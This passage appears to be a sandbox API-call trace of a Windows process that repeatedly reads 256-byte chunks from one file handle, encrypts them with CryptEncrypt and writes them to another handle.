hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.150] GetLastError () returned 0x0 [0170.150] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.150] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.150] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.150] GetLastError () returned 0x0 [0170.150] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.150] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.150] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.150] GetLastError () returned 0x0 [0170.150] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.150] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.150] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.150] GetLastError () returned 0x0 [0170.150] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.150] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.150] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.150] GetLastError () returned 0x0 [0170.150] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.150] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.151] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.151] GetLastError () returned 0x0 [0170.151] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.151] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.151] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.151] GetLastError () returned 0x0 [0170.151] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.151] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.151] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.151] GetLastError () returned 0x0 [0170.151] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.151] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.151] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.151] GetLastError () returned 0x0 [0170.151] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.152] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.152] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.152] GetLastError () returned 0x0 [0170.152] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.152] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.152] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.152] GetLastError () returned 0x0 [0170.152] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.152] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.152] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.152] GetLastError () returned 0x0 [0170.152] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.152] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.152] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.152] GetLastError () returned 0x0 [0170.152] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.152] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.153] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.153] GetLastError () returned 0x0 [0170.153] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.153] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.153] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.153] GetLastError () returned 0x0 [0170.153] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.153] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.153] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.153] GetLastError () returned 0x0 [0170.153] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.154] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.154] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.154] GetLastError () returned 0x0 [0170.154] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.154] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.154] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.154] GetLastError () returned 0x0 [0170.154] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.154] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.154] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.154] GetLastError () returned 0x0 [0170.154] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.154] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.154] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.154] GetLastError () returned 0x0 [0170.154] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.155] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.155] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.155] GetLastError () returned 0x0 [0170.155] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.155] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.155] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.155] GetLastError () returned 0x0 [0170.155] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.155] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.155] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.155] GetLastError () returned 0x0 [0170.155] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.155] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.155] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.155] GetLastError () returned 0x0 [0170.155] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.155] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.156] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.156] GetLastError () returned 0x0 [0170.156] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.156] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.156] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.156] GetLastError () returned 0x0 [0170.156] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.156] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.156] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.156] GetLastError () returned 0x0 [0170.156] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.156] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.156] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.156] GetLastError () returned 0x0 [0170.156] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.156] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.156] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.156] GetLastError () returned 0x0 [0170.156] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.157] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.157] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.157] GetLastError () returned 0x0 [0170.157] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.157] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.157] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.157] GetLastError () returned 0x0 [0170.157] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.157] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.157] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.157] GetLastError () returned 0x0 [0170.157] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.157] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.157] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, 